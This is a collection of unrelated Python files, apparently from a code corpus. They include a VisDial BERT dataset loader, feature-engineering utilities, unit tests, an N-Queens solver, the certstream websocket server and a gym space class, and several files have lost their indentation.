class VisdialDataset(data.Dataset):
def __init__(self, params):
self.numDataPoints = {}
num_samples_train = params['num_train_samples']
num_samples_val = params['num_val_samples']
self._image_features_reader = ImageFeaturesH5Reader(params['visdial_image_feats'])
with open(params['visdial_processed_train']) as f:
self.visdial_data_train = json.load(f)
if params['overfit']:
if num_samples_train:
self.numDataPoints['train'] = num_samples_train
else:
self.numDataPoints['train'] = 5
else:
if num_samples_train:
self.numDataPoints['train'] = num_samples_train
else:
self.numDataPoints['train'] = len(self.visdial_data_train['data']['dialogs'])
with open(params['visdial_processed_val']) as f:
self.visdial_data_val = json.load(f)
if params['overfit']:
if num_samples_val:
self.numDataPoints['val'] = num_samples_val
else:
self.numDataPoints['val'] = 5
else:
if num_samples_val:
self.numDataPoints['val'] = num_samples_val
else:
self.numDataPoints['val'] = len(self.visdial_data_val['data']['dialogs'])
with open(params['visdial_processed_test']) as f:
self.visdial_data_test = json.load(f)
self.numDataPoints['test'] = len(self.visdial_data_test['data']['dialogs'])
self.overfit = params['overfit']
with open(params['visdial_processed_val_dense_annotations']) as f:
self.visdial_data_val_dense = json.load(f)
self.num_options = params["num_options"]
self._split = 'train'
self.subsets = ['train','val','test']
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.tokenizer = tokenizer
        # fetch the token indices of [CLS], [MASK] and [SEP]
tokens = ['[CLS]','[MASK]','[SEP]']
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
self.CLS = indexed_tokens[0]
self.MASK = indexed_tokens[1]
self.SEP = indexed_tokens[2]
self.params = params
self._max_region_num = 37
def __len__(self):
return self.numDataPoints[self._split]
@property
def split(self):
return self._split
@split.setter
def split(self, split):
assert split in self.subsets
self._split = split
def __getitem__(self, index):
def tokens2str(seq):
dialog_sequence = ''
for sentence in seq:
for word in sentence:
dialog_sequence += self.tokenizer._convert_id_to_token(word) + " "
dialog_sequence += ' </end> '
dialog_sequence = dialog_sequence.encode('utf8')
return dialog_sequence
def pruneRounds(context, num_rounds):
start_segment = 1
len_context = len(context)
cur_rounds = (len(context) // 2) + 1
l_index = 0
if cur_rounds > num_rounds:
# caption is not part of the final input
l_index = len_context - (2 * num_rounds)
start_segment = 0
return context[l_index:], start_segment
# Combining all the dialog rounds with the [SEP] and [CLS] token
MAX_SEQ_LEN = self.params['max_seq_len']
cur_data = None
if self._split == 'train':
cur_data = self.visdial_data_train['data']
elif self._split == 'val':
if self.overfit:
cur_data = self.visdial_data_train['data']
else:
cur_data = self.visdial_data_val['data']
else:
cur_data = self.visdial_data_test['data']
# number of options to score on
num_options = self.num_options
assert num_options > 1 and num_options <= 100
dialog = cur_data['dialogs'][index]
cur_questions = cur_data['questions']
cur_answers = cur_data['answers']
img_id = dialog['image_id']
if self._split == 'train':
utterances = []
utterances_random = []
tokenized_caption = self.tokenizer.encode(dialog['caption'])
utterances.append([tokenized_caption])
utterances_random.append([tokenized_caption])
            tot_len = len(tokenized_caption) + 2  # +2 for the [CLS] token and the [SEP] token that follows the caption
for rnd,utterance in enumerate(dialog['dialog']):
cur_rnd_utterance = utterances[-1].copy()
cur_rnd_utterance_random = utterances[-1].copy()
tokenized_question = self.tokenizer.encode(cur_questions[utterance['question']])
tokenized_answer = self.tokenizer.encode(cur_answers[utterance['answer']])
cur_rnd_utterance.append(tokenized_question)
cur_rnd_utterance.append(tokenized_answer)
question_len = len(tokenized_question)
answer_len = len(tokenized_answer)
tot_len += question_len + 1 # the additional 1 is for the sep token
tot_len += answer_len + 1 # the additional 1 is for the sep token
cur_rnd_utterance_random.append(self.tokenizer.encode(cur_questions[utterance['question']]))
                # sample random (negative) answer options for this round below
utterances.append(cur_rnd_utterance)
num_inds = len(utterance['answer_options'])
gt_option_ind = utterance['gt_index']
negative_samples = []
for _ in range(self.params["num_negative_samples"]):
all_inds = list(range(100))
all_inds.remove(gt_option_ind)
all_inds = all_inds[:(num_options-1)]
tokenized_random_utterance = None
option_ind = None
while len(all_inds):
option_ind = random.choice(all_inds)
tokenized_random_utterance = self.tokenizer.encode(cur_answers[utterance['answer_options'][option_ind]])
# the 1 here is for the sep token at the end of each utterance
if(MAX_SEQ_LEN >= (tot_len + len(tokenized_random_utterance) + 1)):
break
else:
all_inds.remove(option_ind)
if len(all_inds) == 0:
# all the options exceed the max len. Truncate the last utterance in this case.
tokenized_random_utterance = tokenized_random_utterance[:answer_len]
t = cur_rnd_utterance_random.copy()
t.append(tokenized_random_utterance)
negative_samples.append(t)
utterances_random.append(negative_samples)
# removing the caption in the beginning
utterances = utterances[1:]
utterances_random = utterances_random[1:]
assert len(utterances) == len(utterances_random) == 10
tokens_all_rnd = []
mask_all_rnd = []
segments_all_rnd = []
sep_indices_all_rnd = []
next_labels_all_rnd = []
hist_len_all_rnd = []
for j,context in enumerate(utterances):
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
next_labels_all = []
hist_len_all = []
context, start_segment = pruneRounds(context, self.params['visdial_tot_rounds'])
# print("{}: {}".format(j, tokens2str(context)))
tokens, segments, sep_indices, mask = encode_input(context, start_segment, self.CLS,
self.SEP, self.MASK, max_seq_len=MAX_SEQ_LEN, mask_prob=self.params["mask_prob"])
tokens_all.append(tokens)
mask_all.append(mask)
sep_indices_all.append(sep_indices)
next_labels_all.append(torch.LongTensor([0]))
segments_all.append(segments)
hist_len_all.append(torch.LongTensor([len(context)-1]))
negative_samples = utterances_random[j]
for context_random in negative_samples:
context_random, start_segment = pruneRounds(context_random, self.params['visdial_tot_rounds'])
# print("{}: {}".format(j, tokens2str(context_random)))
tokens_random, segments_random, sep_indices_random, mask_random = encode_input(context_random, start_segment, self.CLS,
self.SEP, self.MASK, max_seq_len=MAX_SEQ_LEN, mask_prob=self.params["mask_prob"])
tokens_all.append(tokens_random)
mask_all.append(mask_random)
sep_indices_all.append(sep_indices_random)
next_labels_all.append(torch.LongTensor([1]))
segments_all.append(segments_random)
hist_len_all.append(torch.LongTensor([len(context_random)-1]))
tokens_all_rnd.append(torch.cat(tokens_all,0).unsqueeze(0))
mask_all_rnd.append(torch.cat(mask_all,0).unsqueeze(0))
segments_all_rnd.append(torch.cat(segments_all, 0).unsqueeze(0))
sep_indices_all_rnd.append(torch.cat(sep_indices_all, 0).unsqueeze(0))
next_labels_all_rnd.append(torch.cat(next_labels_all, 0).unsqueeze(0))
hist_len_all_rnd.append(torch.cat(hist_len_all,0).unsqueeze(0))
tokens_all_rnd = torch.cat(tokens_all_rnd,0)
mask_all_rnd = torch.cat(mask_all_rnd,0)
segments_all_rnd = torch.cat(segments_all_rnd, 0)
sep_indices_all_rnd = torch.cat(sep_indices_all_rnd, 0)
next_labels_all_rnd = torch.cat(next_labels_all_rnd, 0)
hist_len_all_rnd = torch.cat(hist_len_all_rnd,0)
item = {}
item['tokens'] = tokens_all_rnd
item['segments'] = segments_all_rnd
item['sep_indices'] = sep_indices_all_rnd
item['mask'] = mask_all_rnd
item['next_sentence_labels'] = next_labels_all_rnd
item['hist_len'] = hist_len_all_rnd
# get image features
features, num_boxes, boxes, _ , image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(features, num_boxes, boxes, image_target, max_regions=self._max_region_num)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
return item
elif self.split == 'val':
# append all the 100 options and return all the 100 options concatenated with history
# that will lead to 1000 forward passes for a single image
gt_relevance = None
utterances = []
gt_option_inds = []
utterances.append([self.tokenizer.encode(dialog['caption'])])
options_all = []
for rnd,utterance in enumerate(dialog['dialog']):
cur_rnd_utterance = utterances[-1].copy()
cur_rnd_utterance.append(self.tokenizer.encode(cur_questions[utterance['question']]))
# current round
gt_option_ind = utterance['gt_index']
option_inds = []
option_inds.append(gt_option_ind)
all_inds = list(range(100))
all_inds.remove(gt_option_ind)
all_inds = all_inds[:(num_options-1)]
option_inds.extend(all_inds)
gt_option_inds.append(0)
cur_rnd_options = []
answer_options = [utterance['answer_options'][k] for k in option_inds]
assert len(answer_options) == len(option_inds) == num_options
assert answer_options[0] == utterance['answer']
if rnd == self.visdial_data_val_dense[index]['round_id'] - 1:
gt_relevance = torch.Tensor(self.visdial_data_val_dense[index]['gt_relevance'])
# shuffle based on new indices
gt_relevance = gt_relevance[torch.LongTensor(option_inds)]
for answer_option in answer_options:
cur_rnd_cur_option = cur_rnd_utterance.copy()
cur_rnd_cur_option.append(self.tokenizer.encode(cur_answers[answer_option]))
cur_rnd_options.append(cur_rnd_cur_option)
cur_rnd_utterance.append(self.tokenizer.encode(cur_answers[utterance['answer']]))
utterances.append(cur_rnd_utterance)
options_all.append(cur_rnd_options)
# encode the input and create batch x 10 x 100 * max_len arrays (batch x num_rounds x num_options)
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
hist_len_all = []
for rnd,cur_rnd_options in enumerate(options_all):
tokens_all_rnd = []
mask_all_rnd = []
segments_all_rnd = []
sep_indices_all_rnd = []
hist_len_all_rnd = []
for j,cur_rnd_option in enumerate(cur_rnd_options):
cur_rnd_option, start_segment = pruneRounds(cur_rnd_option, self.params['visdial_tot_rounds'])
tokens, segments, sep_indices, mask = encode_input(cur_rnd_option, start_segment,self.CLS,
self.SEP, self.MASK ,max_seq_len=MAX_SEQ_LEN, mask_prob=0)
tokens_all_rnd.append(tokens)
mask_all_rnd.append(mask)
segments_all_rnd.append(segments)
sep_indices_all_rnd.append(sep_indices)
hist_len_all_rnd.append(torch.LongTensor([len(cur_rnd_option)-1]))
tokens_all.append(torch.cat(tokens_all_rnd,0).unsqueeze(0))
mask_all.append(torch.cat(mask_all_rnd,0).unsqueeze(0))
segments_all.append(torch.cat(segments_all_rnd,0).unsqueeze(0))
sep_indices_all.append(torch.cat(sep_indices_all_rnd,0).unsqueeze(0))
hist_len_all.append(torch.cat(hist_len_all_rnd,0).unsqueeze(0))
tokens_all = torch.cat(tokens_all,0)
mask_all = torch.cat(mask_all,0)
segments_all = torch.cat(segments_all, 0)
sep_indices_all = torch.cat(sep_indices_all, 0)
hist_len_all = torch.cat(hist_len_all,0)
item = {}
item['tokens'] = tokens_all
item['segments'] = segments_all
item['sep_indices'] = sep_indices_all
item['mask'] = mask_all
item['hist_len'] = hist_len_all
item['gt_option_inds'] = torch.LongTensor(gt_option_inds)
# return dense annotation data as well
item['round_id'] = torch.LongTensor([self.visdial_data_val_dense[index]['round_id']])
item['gt_relevance'] = gt_relevance
# add image features. Expand them to create batch * num_rounds * num options * num bbox * img feats
features, num_boxes, boxes, _ , image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(features, num_boxes, boxes, \
image_target, max_regions=self._max_region_num, mask_prob=0)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
item['image_id'] = torch.LongTensor([img_id])
return item
else:
assert num_options == 100
cur_rnd_utterance = [self.tokenizer.encode(dialog['caption'])]
options_all = []
for rnd,utterance in enumerate(dialog['dialog']):
cur_rnd_utterance.append(self.tokenizer.encode(cur_questions[utterance['question']]))
if rnd != len(dialog['dialog'])-1:
cur_rnd_utterance.append(self.tokenizer.encode(cur_answers[utterance['answer']]))
for answer_option in dialog['dialog'][-1]['answer_options']:
cur_option = cur_rnd_utterance.copy()
cur_option.append(self.tokenizer.encode(cur_answers[answer_option]))
options_all.append(cur_option)
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
hist_len_all = []
for j, option in enumerate(options_all):
option, start_segment = pruneRounds(option, self.params['visdial_tot_rounds'])
print("option: {} {}".format(j, tokens2str(option)))
tokens, segments, sep_indices, mask = encode_input(option, start_segment ,self.CLS,
self.SEP, self.MASK ,max_seq_len=MAX_SEQ_LEN, mask_prob=0)
tokens_all.append(tokens)
mask_all.append(mask)
segments_all.append(segments)
sep_indices_all.append(sep_indices)
hist_len_all.append(torch.LongTensor([len(option)-1]))
tokens_all = torch.cat(tokens_all,0)
mask_all = torch.cat(mask_all,0)
segments_all = torch.cat(segments_all, 0)
sep_indices_all = torch.cat(sep_indices_all, 0)
hist_len_all = torch.cat(hist_len_all,0)
item = {}
item['tokens'] = tokens_all.unsqueeze(0)
item['segments'] = segments_all.unsqueeze(0)
item['sep_indices'] = sep_indices_all.unsqueeze(0)
item['mask'] = mask_all.unsqueeze(0)
item['hist_len'] = hist_len_all.unsqueeze(0)
item['image_id'] = torch.LongTensor([img_id])
item['round_id'] = torch.LongTensor([dialog['round_id']])
# add image features. Expand them to create batch * num_rounds * num options * num bbox * img feats
features, num_boxes, boxes, _ , image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(features, num_boxes, boxes, \
image_target, max_regions=self._max_region_num, mask_prob=0)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
return item |
503847 | import pandas as pd
from sklearn import datasets
iris = datasets.load_iris()
iris_df = pd.DataFrame(iris.data, columns = iris.feature_names)
iris_df.head()
iris_df.describe()
|
503921 | from .worker import Worker
from .queue_manager import QueueManager
from .constants import RETRY_TYPE
from .job_queue import JobQueue
from .exceptions import *
from .scheduling_time import SchedulingTime
|
503931 | import pandas as pd
import numpy as np
import nltk
import multiprocessing
import difflib
import time
import gc
import xgboost as xgb
import category_encoders as ce
import itertools
from collections import Counter
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split
def labelcount_encode(df, cols):
categorical_features = cols
new_df = pd.DataFrame()
for cat_feature in categorical_features:
cat_feature_value_counts = df[cat_feature].value_counts()
value_counts_list = cat_feature_value_counts.index.tolist()
value_counts_range_rev = list(reversed(range(len(cat_feature_value_counts)))) # for ascending ordering
value_counts_range = list(range(len(cat_feature_value_counts))) # for descending ordering
labelcount_dict = dict(zip(value_counts_list, value_counts_range))
new_df['{}_lc_encode'.format(cat_feature)] = df[cat_feature].map(labelcount_dict)
return new_df
def count_encode(df, cols, normalize = False):
categorical_features = cols
new_df = pd.DataFrame()
for i in categorical_features:
new_df['{}_count_encode'.format(i)] = df[i].astype('object').replace(df[i].value_counts())
if normalize:
new_df['{}_count_encode'.format(i)] = new_df['{}_count_encode'.format(i)] / np.max(new_df['{}_count_encode'.format(i)])
return new_df
def bin_numerical(df, cols, step):
numerical_features = cols
new_df = pd.DataFrame()
for i in numerical_features:
try:
feature_range = np.arange(0, np.max(df[i]), step)
new_df['{}_binned'.format(i)] = np.digitize(df[i], feature_range, right=True)
except ValueError:
df[i] = df[i].replace(np.inf, 999)
feature_range = np.arange(0, np.max(df[i]), step)
new_df['{}_binned'.format(i)] = np.digitize(df[i], feature_range, right=True)
return new_df
def add_statistics(df, features_list):
X = pd.DataFrame()
X['sum_row_{}cols'.format(len(features_list))] = df[features_list].sum(axis = 1)
X['mean_row{}cols'.format(len(features_list))] = df[features_list].mean(axis = 1)
X['std_row{}cols'.format(len(features_list))] = df[features_list].std(axis = 1)
X['max_row{}cols'.format(len(features_list))] = np.amax(df[features_list], axis = 1)
print('Statistics of {} columns done.'.format(features_list))
return X
def feature_combinations(df, features_list):
X = pd.DataFrame()
for comb in itertools.combinations(features_list, 2):
feat = comb[0] + "_" + comb[1]
X[feat] = df[comb[0]] * df[comb[1]]
print('Interactions on {} columns done.'.format(features_list))
return X
def group_featbyfeat(df, features_list, transformation):
X = pd.DataFrame()
for i in range(len(features_list) - 1):
X['{}_by_{}_{}_list'.format(features_list[i], features_list[i+1], transformation)] = (df.groupby(features_list[i]))[features_list[i+1]].transform('{}'.format(transformation))
print('Groupings of {} columns done.'.format(features_list))
return X
def feature_comb_grouping(df, features_list, transformation):
X = pd.DataFrame()
for comb in itertools.combinations(features_list, 2):
X['{}_by_{}_{}_combinations'.format(comb[0], comb[1], transformation)] = (df.groupby(comb[0]))[comb[1]].transform('{}'.format(transformation))
print('Interactions on {} columns done.'.format(features_list))
return X
def drop_duplicate_cols(df):
dfc = df.iloc[:5000,:]
dfc = dfc.T.drop_duplicates().T
duplicate_cols = sorted(list(set(df.columns).difference(set(dfc.columns))))
print('Dropping duplicate columns:', duplicate_cols)
df.drop(duplicate_cols, axis = 1, inplace = True)
print('Final shape:', df.shape)
del dfc
gc.collect()
return df
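# Minimal usage sketch (toy data, not from the original script) showing how the
# categorical encoders and row-statistics helpers above can be applied; the column
# names here are hypothetical.
if __name__ == '__main__':
    toy = pd.DataFrame({'city': ['a', 'b', 'a', 'c', 'a', 'b'],
                        'color': ['x', 'x', 'y', 'y', 'y', 'x'],
                        'f1': [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
                        'f2': [0.5, 0.5, 1.5, 2.5, 3.5, 4.5]})
    print(labelcount_encode(toy, ['city', 'color']))      # rank categories by frequency
    print(count_encode(toy, ['city'], normalize=True))    # (normalized) frequency counts
    print(bin_numerical(toy, ['f1'], step=2))             # bucket numericals into steps of 2
    print(add_statistics(toy, ['f1', 'f2']))              # row-wise sum/mean/std/max
    print(feature_combinations(toy, ['f1', 'f2']))        # pairwise products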
|
503936 | def gamify(self):
    '''Apply reduction changes based on edits made to the
    produced .json file in the experiment folder.'''
if self.param_object.round_counter == 1:
# create the gamify object
from .GamifyMap import GamifyMap
g = GamifyMap(self)
# keep in scan_object
self._gamify_object = g
# do the first export in the experiment folder
g.export_json()
return self
# for every round check if there are changes
self._gamify_object.import_json()
self = self._gamify_object.run_updates()
self._gamify_object.export_json()
return self
|
503944 | from main import db
from sqlalchemy import Column, Integer, ForeignKey, DateTime
from sqlalchemy.orm import relationship
import datetime
class Follower(db.Model):
    # Records that user `source` follows user `target`.
source = Column(
Integer,
ForeignKey("user.id", ondelete="CASCADE"),
primary_key=True,
index=True)
target = Column(
Integer,
ForeignKey("user.id", ondelete="CASCADE"),
primary_key=True,
index=True)
time = Column(DateTime, index=True, default=datetime.datetime.now)
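# Example queries (a sketch; assumes the Flask-SQLAlchemy `db` configured in `main`):
#   Follower.query.filter_by(target=user_id).count()  -> how many users follow user_id
#   Follower.query.filter_by(source=user_id).count()  -> how many users user_id follows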
|
503989 | from imagededup.utils import general_utils
"""Run from project root with: python -m pytest -vs tests/test_general_utils.py"""
def test_get_files_to_remove():
from collections import OrderedDict
dict_a = OrderedDict({'1': ['2'], '2': ['1', '3'], '3': ['4'], '4': ['3'], '5': []})
dups_to_remove = general_utils.get_files_to_remove(dict_a)
assert set(dups_to_remove) == set(['2', '4'])
|
504024 | import logging
from django.http import HttpResponse
from openunipay.models import PAY_WAY_ALI
from openunipay.paygateway import unipay
_logger = logging.getLogger('openunipay_ali_pay_notification')
def process_notify(request):
    _logger.info('received ali pay notification. body: {}'.format(request.body))
unipay.process_notify(PAY_WAY_ALI, request)
return HttpResponse('success', 'text/plain-text', 200)
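# Hypothetical wiring (a sketch, not part of this module): gateway callbacks are usually
# exempted from CSRF checks, e.g. in the project's urls.py:
#   from django.urls import path
#   from django.views.decorators.csrf import csrf_exempt
#   urlpatterns = [path('pay/ali/notify/', csrf_exempt(process_notify))]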
|
504033 | import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.zone_airflow import ZoneCrossMixing
log = logging.getLogger(__name__)
class TestZoneCrossMixing(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_zonecrossmixing(self):
pyidf.validation_level = ValidationLevel.error
obj = ZoneCrossMixing()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_zone_name = "object-list|Zone Name"
obj.zone_name = var_zone_name
# object-list
var_schedule_name = "object-list|Schedule Name"
obj.schedule_name = var_schedule_name
# alpha
var_design_flow_rate_calculation_method = "Flow/Zone"
obj.design_flow_rate_calculation_method = var_design_flow_rate_calculation_method
# real
var_design_flow_rate = 0.0
obj.design_flow_rate = var_design_flow_rate
# real
var_flow_rate_per_zone_floor_area = 0.0
obj.flow_rate_per_zone_floor_area = var_flow_rate_per_zone_floor_area
# real
var_flow_rate_per_person = 0.0
obj.flow_rate_per_person = var_flow_rate_per_person
# real
var_air_changes_per_hour = 0.0
obj.air_changes_per_hour = var_air_changes_per_hour
# object-list
var_source_zone_name = "object-list|Source Zone Name"
obj.source_zone_name = var_source_zone_name
# real
var_delta_temperature = 0.0
obj.delta_temperature = var_delta_temperature
# object-list
var_delta_temperature_schedule_name = "object-list|Delta Temperature Schedule Name"
obj.delta_temperature_schedule_name = var_delta_temperature_schedule_name
# object-list
var_minimum_zone_temperature_schedule_name = "object-list|Minimum Zone Temperature Schedule Name"
obj.minimum_zone_temperature_schedule_name = var_minimum_zone_temperature_schedule_name
# object-list
var_maximum_zone_temperature_schedule_name = "object-list|Maximum Zone Temperature Schedule Name"
obj.maximum_zone_temperature_schedule_name = var_maximum_zone_temperature_schedule_name
# object-list
var_minimum_source_zone_temperature_schedule_name = "object-list|Minimum Source Zone Temperature Schedule Name"
obj.minimum_source_zone_temperature_schedule_name = var_minimum_source_zone_temperature_schedule_name
# object-list
var_maximum_source_zone_temperature_schedule_name = "object-list|Maximum Source Zone Temperature Schedule Name"
obj.maximum_source_zone_temperature_schedule_name = var_maximum_source_zone_temperature_schedule_name
# object-list
var_minimum_outdoor_temperature_schedule_name = "object-list|Minimum Outdoor Temperature Schedule Name"
obj.minimum_outdoor_temperature_schedule_name = var_minimum_outdoor_temperature_schedule_name
# object-list
var_maximum_outdoor_temperature_schedule_name = "object-list|Maximum Outdoor Temperature Schedule Name"
obj.maximum_outdoor_temperature_schedule_name = var_maximum_outdoor_temperature_schedule_name
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.zonecrossmixings[0].name, var_name)
self.assertEqual(idf2.zonecrossmixings[0].zone_name, var_zone_name)
self.assertEqual(idf2.zonecrossmixings[0].schedule_name, var_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].design_flow_rate_calculation_method, var_design_flow_rate_calculation_method)
self.assertAlmostEqual(idf2.zonecrossmixings[0].design_flow_rate, var_design_flow_rate)
self.assertAlmostEqual(idf2.zonecrossmixings[0].flow_rate_per_zone_floor_area, var_flow_rate_per_zone_floor_area)
self.assertAlmostEqual(idf2.zonecrossmixings[0].flow_rate_per_person, var_flow_rate_per_person)
self.assertAlmostEqual(idf2.zonecrossmixings[0].air_changes_per_hour, var_air_changes_per_hour)
self.assertEqual(idf2.zonecrossmixings[0].source_zone_name, var_source_zone_name)
self.assertAlmostEqual(idf2.zonecrossmixings[0].delta_temperature, var_delta_temperature)
self.assertEqual(idf2.zonecrossmixings[0].delta_temperature_schedule_name, var_delta_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].minimum_zone_temperature_schedule_name, var_minimum_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].maximum_zone_temperature_schedule_name, var_maximum_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].minimum_source_zone_temperature_schedule_name, var_minimum_source_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].maximum_source_zone_temperature_schedule_name, var_maximum_source_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].minimum_outdoor_temperature_schedule_name, var_minimum_outdoor_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].maximum_outdoor_temperature_schedule_name, var_maximum_outdoor_temperature_schedule_name) |
"""
Follow-up to the N-Queens problem.

Now, instead of outputting board configurations, return the total number of
distinct solutions.
"""
class Solution:
# @param {integer} n
# @return {integer}
def totalNQueens(self, n):
if n == 0: return 0
        self.result = 0  # instance attribute so the count persists across recursive calls
        checklist = [-1 for i in range(n)]
self.queen_helper(n, 0, checklist)
return self.result
def check_helper(self, depth, i, checklist):
        for k in range(depth):
if checklist[k] == i or abs(checklist[k] - i) == abs(depth-k):
return False
return True
def queen_helper(self, n, depth, checklist):
if depth == n:
            self.result += 1
            return
        for i in range(n):
if self.check_helper(depth, i, checklist):
checklist[depth] = i
self.queen_helper(n, depth+1, checklist)
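if __name__ == "__main__":
    # Sanity check: the 4-queens puzzle has 2 distinct solutions and the 8-queens puzzle has 92.
    solver = Solution()
    print(solver.totalNQueens(4))  # 2
    print(solver.totalNQueens(8))  # 92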
|
504064 | import asyncio
import collections
import json
import logging
import os
import time
import ssl
from aiohttp import web
from aiohttp.web_urldispatcher import Response
from aiohttp.web_ws import WebSocketResponse
from certstream.util import pretty_date, get_ip
WebsocketClientInfo = collections.namedtuple(
'WebsocketClientInfo',
['external_ip', 'queue', 'connection_time']
)
STATIC_INDEX = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700" rel="stylesheet">
</head>
<body>
<div id="app"></div>
<script type="text/javascript" src="https://storage.googleapis.com/certstream-prod/build.js?v={}"></script></body>
</html>
'''.format(time.time())
class WebServer(object):
def __init__(self, _loop, transparency_watcher):
self.active_sockets = []
self.recently_seen = collections.deque(maxlen=25)
self.stats_url = os.getenv("STATS_URL", 'stats')
self.logger = logging.getLogger('certstream.webserver')
self.loop = _loop
self.watcher = transparency_watcher
self.app = web.Application(loop=self.loop)
self._add_routes()
def run_server(self):
self.mux_stream = asyncio.ensure_future(self.mux_ctl_stream())
self.heartbeat_coro = asyncio.ensure_future(self.ws_heartbeats())
if os.environ.get("NOSSL", False):
ssl_ctx = None
else:
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.load_cert_chain(certfile=os.getenv("SERVER_CERT", "server.crt"), keyfile=os.getenv("SERVER_KEY", "server.key"))
web.run_app(
self.app,
port=int(os.environ.get('PORT', 8080)),
ssl_context=ssl_ctx
)
def _add_routes(self):
self.app.router.add_get("/latest.json", self.latest_json_handler)
self.app.router.add_get("/example.json", self.example_json_handler)
self.app.router.add_get("/{}".format(self.stats_url), self.stats_handler)
self.app.router.add_get('/', self.root_handler)
self.app.router.add_get('/develop', self.dev_handler)
async def mux_ctl_stream(self):
while True:
cert_data = await self.watcher.stream.get()
data_packet = {
"message_type": "certificate_update",
"data": cert_data
}
self.recently_seen.append(data_packet)
for client in self.active_sockets:
try:
client.queue.put_nowait(data_packet)
except asyncio.QueueFull:
pass
async def dev_handler(self, request):
# If we have a websocket request
if request.headers.get("Upgrade"):
ws = web.WebSocketResponse()
await ws.prepare(request)
try:
for message in self.recently_seen:
message_json = json.dumps(message)
await ws.send_str(message_json)
except asyncio.CancelledError:
print('websocket cancelled')
await ws.close()
return ws
return web.Response(
body=json.dumps(
{
"error": "Please use this url with a websocket client!"
},
indent=4
),
content_type="application/json",
)
async def root_handler(self, request):
resp = WebSocketResponse()
available = resp.can_prepare(request)
if not available:
return Response(body=STATIC_INDEX, content_type="text/html")
await resp.prepare(request)
client_queue = asyncio.Queue(maxsize=500)
client = WebsocketClientInfo(
external_ip=get_ip(request),
queue=client_queue,
connection_time=int(time.time()),
)
try:
self.logger.info('Client {} joined.'.format(client.external_ip))
self.active_sockets.append(client)
while True:
message = await client_queue.get()
message_json = json.dumps(message)
await resp.send_str(message_json)
finally:
self.active_sockets.remove(client)
self.logger.info('Client {} disconnected.'.format(client.external_ip))
async def latest_json_handler(self, _):
return web.Response(
body=json.dumps(
{
"messages": list(self.recently_seen)
},
indent=4
),
headers={"Access-Control-Allow-Origin": "*"},
content_type="application/json",
)
async def example_json_handler(self, _):
if self.recently_seen:
return web.Response(
body=json.dumps(list(self.recently_seen)[0], indent=4),
headers={"Access-Control-Allow-Origin": "*"},
content_type="application/json",
)
else:
return web.Response(
body="{}",
headers={"Access-Control-Allow-Origin": "*"},
content_type="application/json"
)
async def stats_handler(self, _):
clients = {}
for client in self.active_sockets:
client_identifier = "{}-{}".format(client.external_ip, client.connection_time)
clients[client_identifier] = {
"ip_address": client.external_ip,
"conection_time": client.connection_time,
"connection_length": pretty_date(client.connection_time),
"queue_size": client.queue.qsize(),
}
return web.Response(
body=json.dumps({
"connected_client_count": len(self.active_sockets),
"clients": clients
}, indent=4
),
content_type="application/json",
)
async def ws_heartbeats(self):
self.logger.info("Starting WS heartbeat coro...")
while True:
await asyncio.sleep(30)
self.logger.debug("Sending ping...")
timestamp = time.time()
for client in self.active_sockets:
await client.queue.put({
"message_type": "heartbeat",
"timestamp": timestamp
})
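# A minimal client sketch (an assumption, not part of the original server): with the
# server running locally without SSL (NOSSL set, default port 8080), an aiohttp
# websocket client can consume the "certificate_update" and "heartbeat" messages
# produced above.
async def example_client(url="ws://localhost:8080/"):
    import aiohttp
    async with aiohttp.ClientSession() as session:
        async with session.ws_connect(url) as ws:
            async for msg in ws:
                if msg.type == aiohttp.WSMsgType.TEXT:
                    payload = json.loads(msg.data)
                    print(payload.get("message_type"))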
if __name__ == "__main__":
from certstream.watcher import TransparencyWatcher
loop = asyncio.get_event_loop()
watcher = TransparencyWatcher(loop)
webserver = WebServer(loop, watcher)
asyncio.ensure_future(asyncio.gather(*watcher.get_tasks()))
webserver.run_server()
|
504085 | import numpy as np
from environments.mujoco.rand_param_envs import gym
from environments.mujoco.rand_param_envs.gym.spaces import prng
class MultiBinary(gym.Space):
def __init__(self, n):
self.n = n
def sample(self):
return prng.np_random.randint(low=0, high=2, size=self.n)
def contains(self, x):
return ((x == 0) | (x == 1)).all()
def to_jsonable(self, sample_n):
return sample_n.tolist()
def from_jsonable(self, sample_n):
return np.array(sample_n)
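if __name__ == '__main__':
    # Minimal sketch: draw a random length-5 binary vector, check membership, and
    # round-trip it through the JSON helpers (relies on the bundled gym fork's prng).
    space = MultiBinary(5)
    x = space.sample()
    assert space.contains(x)
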